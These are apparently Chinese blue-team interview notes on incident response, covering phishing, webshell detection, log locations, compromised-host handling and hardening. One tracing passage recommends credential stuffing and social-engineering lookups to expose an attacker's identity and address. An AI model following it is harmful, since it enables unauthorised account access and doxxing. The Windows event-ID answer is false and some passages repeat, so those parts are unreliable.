分析邮件头部：查看邮件的原始头部信息
检查发件人的真实地址、邮件服务器的来源、邮件传输路径等
注意查看"Received"字段，查看是否存在异常的邮件转发或代理
分析链接与附件，添加至黑名单
查看有多少内网ip访问过这个链接或者ip，双向排查

## 怎么排查 0day1. 先对失陷的机器进行隔离，进行口令策略加固，封禁入侵IP
2. 排查 0day 流量，通过流量探针进行攻击流量排查，同时分析下应用日志，重点看下异常报错还有登录的地方，还有url比较长，一看就不正常的
3. 还有就是异常文件，如果有异常文件，可以先分析后处理，然后回溯排查，拿不准的话可以取得经理同意后复现，进行加固，及时向waf写规则## 一台机子失陷了，因业务需要不能断网，怎么处理1. 关闭ssh、rdp等允许远程连接的协议端口
2. 看下外联，有无可疑ip，若有对其进行封禁，或设置ip白名单，只能有所需要的ip才能访问
3. 排查下有无文件遗留，通过 webshellkiller、D 盾、河马之类的工具进行查杀
4. 查看下告警，根据告警事件点审计各类日志和流量，看看怎么打进来的进行加固## 内网机子失陷，怎么做1. 进行隔离、做好边界控制
2. 查看进程、若存在可疑进程通过pid找到文件路径，保留现场，经同意后干掉可疑进程和可疑文件
3. 通过可疑文件的创建时间定位到相应的应用日志位置，看看是怎么进来的，进行加固
4. 查看下定时任务有无可疑的
5. 看看有没有可疑账号存在
6. 确认下有没有文件遗留
7. 使用后门查杀工具进行排查## **linux的日志存放在哪个目录下**Linux 的日志文件通常存储在 /var/log 目录下，这是一个系统和应用程序日志文件的默认存储位置。不同的日志类型存储在不同的子目录下，以下是一些常见的子目录和对应的日志类型： /var/log/messages：系统日志，包含了操作系统的各种信息、警告和错误等。 /var/log/auth.log：安全认证日志，记录系统的用户登录、认证、授权等信息。 /var/log/syslog：系统日志的一个备份文件。 /var/log/kern.log：内核日志，记录内核级别的信息，例如硬件故障等。 /var/log/dmesg：内核环缓存，包含启动信息、硬件检测和驱动程序的信息等。 /var/log/cron：定时任务日志，记录定时任务执行的情况。 /var/log/maillog：邮件日志，包含了邮件服务器的日志信息。## win登录日志怎么看，判断是否登录成功事件查看器里面有windows日志文件，在下面安全性就可以看到很多日志，登录成功的话就会有对应的事件id，登录失败就会有不同的事件id## windows事件ID一般是多少Windows事件ID是用来标识不同事件类型的数字代码。不同类型的事件有不同的事件ID，通常情况下，Windows系统的事件ID是在100到999之间的整数。例如，系统启动时的事件ID为100，关机时的事件ID为200，应用程序错误的事件ID通常在1000以上。需要注意的是，不同版本的Windows操作系统可能会有不同的事件ID编号范围和对应的事件类型，因此在查看和分析Windows日志时，需要根据具体情况进行理解和处理。## **Linux后门排查哪些东西**查看用户信息相关的文件，看看有没有多余的账户、特权账户、隐藏账户、可以远程登录的账户、sudo权限的账户，检查一下网络连接、异常进程，检查定时任务、开机启动、服务、端口、可疑的文件，检查系统日志## Linux怎么查看程序调用了哪些文件lsof -c 指定的程序，查看多个程序的话直接在后面加就可以## **判断自己是否给getshell（就是给用D盾查杀）**webshell：
查web日志，分析攻击流量
扫webshell
排查网站目录，查看最近更改的文件
shell：
查看未知端口，未知进程
排查恶意流量，锁定感染进程
有安全设备就看安全设备 内网报警处理方式（可能会问的会不一样，不会直接问）
首先就要是地位到具体的那一台机器，既然报警那就说明知道了具体的漏洞类型，加相应的补丁打上，
以linux为主（一般都会问linux的），查看/var/log/secure系统日志，查看登录失败的记录，还有Linux历史命令-->home目录的bash_histor，查看执行过的命令。
在利用webshell或者是shell查杀工具查杀，查看tmp目录下是非有带有免杀的木马。彻底清除。再到全流量分析的机子上看，是非有经过其他的机器。
拿到攻击ip之后到线上的一些网站查看主机类型，比如360或者微步上，查看是非是傀儡机，vps跳板，或者是国内个人云主机。
如果是个人云主机，就可以通过whois查看是非有最近绑定的域名，或者绑定者的邮箱。
知道邮箱之后就可以反查询出qq号说多少，再利用社工查询到手机号，
到一个知名的网站上查询这个手机号有没有注册过什么网站，可以去这些网站通过撞库的方法登入，这样就可以拿到这个攻击者的身份证，学校，地址这些了。
（思路是应急响应;加固;溯源） 被攻击后日志文件或者木马文件被删除排查：lsof恢复被删除的文件，然后查日志，查服务，查进程，查看是否有新增的账号
安全设备进行报警如何看是否是外界的攻击，即是否是误报，或是内部人员进行的操作：查看报警日志，对报警的数据进行分析，看是不是内部人员的操作，还是真实的攻击
流量分析是否是误报：分析流量数据包，可以用wireshark，分析流量是不是正常的业务操作 服务中了webshell 怎样从日志找webshell位置，被拿shell后怎么应急，怎样快速定位shell
从日志流量文件开始，先定位位置查看敏感目录tmp usr/sbin etc/ssh ，对新创建文件，修改文件等进行查看，找特殊权限文件比如777 。
流量的话从ua和playload去分析。比如菜刀连jsp木马：第一个参数是a-q，这个是不会变的，第二个是编码，第三个是playload。日志的话从找到的shell时间点去关联分析，可以还原攻击手法
快速定位就是看进程和内存看占用时间长和占用率高的## 挂马怎么排查啊（xss webshell）确认是否被攻击：可以通过检查网站页面源代码、访问日志、异常流量等方式，确定网站是否被攻击。
分析攻击方式：分析黑客攻击方式，了解攻击者的手段，比如是否是通过SQL注入、文件上传漏洞等方式进行攻击。
定位被攻击的文件：查找被攻击的文件，一般包括Web服务器的相关文件、网站源代码、数据库等，可以通过检查文件的时间戳、比对文件的MD5值等方式进行确认。
清除恶意代码：一旦确定被攻击的文件，需要清除恶意代码，可以手动清除或者使用工具进行清除。同时需要注意备份重要数据，以免误操作导致数据丢失。
安全加固：排查完恶意代码后，需要对系统进行加固，避免类似攻击再次发生，可以使用一些安全工具或者参考安全加固手册进行操作。
验证清除结果：最后需要对系统进行全面验证，确保清除工作的完整性和有效性，避免留下后门或者未发现的漏洞等问题。## **webshell检测思路**通过匹配特征码，特征值，危险函数来查找webshell ，webshell如果传到服务器了，在执行函数时这些对于系统调用、系统配置、数据库、文件的操作动作都是可以作为判断依据，Linux下就是nobody用户起了bash,Windows下就是IIS User启动 cmd，这些都是动态特征。再者如果黑客反向连接的话，那很更容易检测了，Agent 和IDS都可以抓现行，Webshell总有一个 HTTP 请求，如果我在网络层监控 HTTP，并且检测到有人访问了一个从没访问过的文件，而且返回了 200，则很容易定位到webshell。使用webshell一般不会在系统日志中留下记录，但是会在网站的 web日志中留下webshell页面的访问数据和数据提交记录## **网页被挂马了，可能有哪些原因**服务器已经被拿下了、通过漏洞修改了前端文件、存储型XSS、可能被上传了木马病毒## 网站被挂马如何应急1.取证，登录服务器，备份，检查服务器敏感目录，查毒（搜索后门文件-注意文件的时间， 用户，后缀等属性），调取日志（系统，中间件日志，WAF日志等）；
2.处理，恢复备份（快照回滚最近一次），确定入侵方法（漏洞检测并进行修复）
3.溯源，查入侵IP，入侵手法（网路攻击事件）的确定等
4.记录，归档--------预防-事件检测-抑制-根除-恢复-跟踪-记录通用漏洞的应对等其他 安全应急事件## 分析日志用什么工具啊使用日志分析工具，如LogForensics，Graylog，Nagios，ELK Stack等等## **webshell杀了以后，还有外连流量怎么办应急**如果杀掉Webshell后仍然有外连流量，可能存在以下情况：
Webshell仍在运行：在杀掉Webshell后，有可能仍然有外连流量，可能是因为Webshell并没有被完全杀死。可以再次检查系统进程，确认Webshell是否被杀死。
恶意程序已经感染其他系统：恶意程序可能已经感染了其他系统，通过其中的一个系统继续进行攻击。可以在网络边界设备上进行流量监测，检查是否有大量的外连流量，确定是否有其他系统被感染。
攻击者已经在系统中植入了后门：攻击者可能已经在系统中植入了后门程序，通过后门程序继续进行攻击。可以在系统中查找可疑的后门程序或者系统服务，同时在网络边界设备上进行流量监测，检查是否有异常的网络流量。
紧急应对的方法可以包括以下步骤：
切断网络连接：如果发现外连流量很大，可以考虑切断网络连接，以防止恶意程序继续进行攻击。
查杀恶意程序：可以使用杀毒软件或者安全工具对系统进行全面扫描，查杀恶意程序，并对系统进行修复。
清除后门和木马：对于已经植入的后门和木马程序，可以使用安全工具进行清除，或者通过手动查找和删除的方式进行清除。
加强安全防护：对于被攻击的系统，需要加强安全防护，包括更新补丁、强化口令、关闭不必要的服务等，以防止再次受到攻击。
在利用webshell或者是shell查杀工具查杀，查看tmp目录下是非有带有免杀的木马。彻底清除。再到全流量分析的机子上看，是非有经过其他的机器。
拿到攻击ip之后到线上的一些网站查看主机类型，比如360或者微步上，查看是非是傀儡机，vps跳板，或者是国内个人云主机。
服务中了webshell 怎样从日志找webshell位置，被拿shell后怎么应急，怎样快速定位shell
从日志流量文件开始，先定位位置查看敏感目录tmp usr/sbin etc/ssh ，对新创建文件，修改文件等进行查看，找特殊权限文件比如777 。
流量的话从ua和playload去分析。比如菜刀连jsp木马：第一个参数是a-q，这个是不会变的，第二个是编码，第三个是playload。日志的话从找到的shell时间点去关联分析，可以还原攻击手法
快速定位就是看进程和内存看占用时间长和占用率高的## 入侵排查的流程1、检查系统账号安全查看服务器是否有弱口令，远程管理端口
是否公开查看服务器是否有可疑账号：cmd输入lusrmgr.msc命令查看服务器是否存在隐藏账号、克隆账号结合日志，查看管理员登录时间，用户名是否存在异常
2、检查异常端口、进程检查端口连接情况，是否有远程连接、可疑连接：a、netstat -ano查看目前的网络连接，
定位可疑的ESTABLISHEDb、根据netstat 定位出的pid，再通过tasklist命令进行进程定位 tasklist | findstr “PID”
3、检查启动项、计划任务、服务win+r：输入msconfig，查看异常启动项win+r：输入regedit，打开注册表，查看开机启动项
4、检查系统相关信息win+r：输入systeminfo查看系统信息
5、日志分析win+r：输入eventvwr.msc,打开事件查看器导出应用程序日志，安全日志，系统日志，利用log parser分析## **如何判断是钓鱼邮件**- 以公司某部门的名义，如安全部、综合部，使用正式的语气，内容涉及到账号和密码等敏感信息，可能带有链接地址或附件，制造紧张氛围，比如24小时内今日下班前完整账号密码修改。
- 看发件人 设备上也会报IP 上微步查一下IP是不是恶意IP 邮件的发件人和内容是不是正常的业务往来
- 附件放到沙箱里 看看是否有问题
- 有的邮件会提示你邮件由另一个邮箱代发，或者邮箱地址不是本公司的，再或者邮箱地址是qq或者163等个人邮箱的，那就更没跑了## 怎么防范邮件钓鱼定期组织员工安全讲座，提供员工的安全意识，企业内邮件系统使用可信赖的邮件服务，员工企业邮箱不得使用弱口令等，如果被感染了也要让大家清楚该做什么，例如直接拔网线等操作## **针对dnslog的反制**对于常见的dnslog平台，直接屏蔽，如果是自己搭建的dnslog平台，批量的去ping，恶意制造各种垃圾dnslog数据，让他无法获取到有效的信息，具体可以写一个脚本进行批量探测存活，httplog也一样，使用爬虫批量进行request请求## **网络基线加固思路**先看防护软件有没有升级，先升级最新版本，进行全盘扫毒，查看高危端口，高危服务，查看主机有没有被爆过漏洞的软件
windows：重命名administrator账户、禁用GUEST账户、清理系统无效账户、配置密码策略账户锁定策略 Linux：删除无用账号、检查特殊账号、添加口令策略、禁止root直接登录、设置隐藏文件属性、关闭不必要服务、更改ssh端口号防爆破## **怎么修改TTL值**windows下是修改Default注册表文件，linux是修改etc/sysctl.conf文件## 一台主机在内网进行横向攻击，你应该怎么做确定攻击来源，是不是员工内部误操作，比如询问运维是否有自动化轮训脚本。如果没有，确定是攻击，结合时间点，根据设备信息，看一下安全事件，进程，流量，找到问题主机，开始应急响应流程：准备，检测，遏制，根除，恢复，跟踪，具体的操作要交给现场运维去处理。## SQL注入的预防预编译
PDO
正则表达式过滤## 如何查看当前进程？Ps -ef 或 ps -aux## 临时目录是哪个文件夹？/tmp ，/var/tmp## 用户列表是在哪个目录下(如何查看Linux有哪些用户)/etc/passwd## 和甲方上报 IP 地址，你要上报哪些地址呢？上报攻击 ip 的地址，先判断是内网 ip 还是公网 ip，如果是内网ip，查看是否是业务白名单行为，若不是再上报进行判断。若是公网 ip，查看是否在白名单内，若不是查看是否是扫描器 ip，若是扫描器 ip，扫描对业务或者对研判产生了影响则可以上报，若不是且判断出是真实攻击 ip 也进行上报。